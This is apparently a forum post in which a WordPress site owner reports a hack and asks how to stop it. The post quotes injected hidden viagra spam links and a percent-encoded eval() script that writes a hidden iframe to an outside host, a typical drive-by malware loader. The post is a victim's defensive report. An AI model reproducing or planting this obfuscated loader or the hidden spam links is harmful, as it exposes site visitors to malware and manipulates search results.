WordPress Exploit: script inserted into code

Lately some of my WordPress blogs have been targeted by some hacker. Everytime I check out the source of my blogs I see these kind of links:

</body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
<a href="https://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
<a href="https://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
<a href="https://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
<a href="https://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>

It has nothing to do with my theme, I’m using my own theme and I am 100% sure that the theme is not the source of the problem.

I have been monitoring my weblogs to see what the cause of the problem is. Here is a list of what I tried to stop it:

– Upgrade to the latest WP (Yet it kept coming back)
– Secure WP admin with htaccess (No effect)
– Change FTP password
– Check permissions of files and folders
– Check plugins

Another thing that I noticed is the following. Almost all of my themes also had the following code inserted at the end of the source code:

<Script>
<!--
var d=document;
eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
//-->
</Script>

What I noticed is that the only solution was to rewrite the old WordPress files with the ones that I downloaded. I finally found where the code was being inserted: index.php in the root folder of the weblog.

I would like to know the following things:

– Is this because of my setup or is this some new WP exploit?
– What can I do to stop these kind of exploits in the future?

Thanks!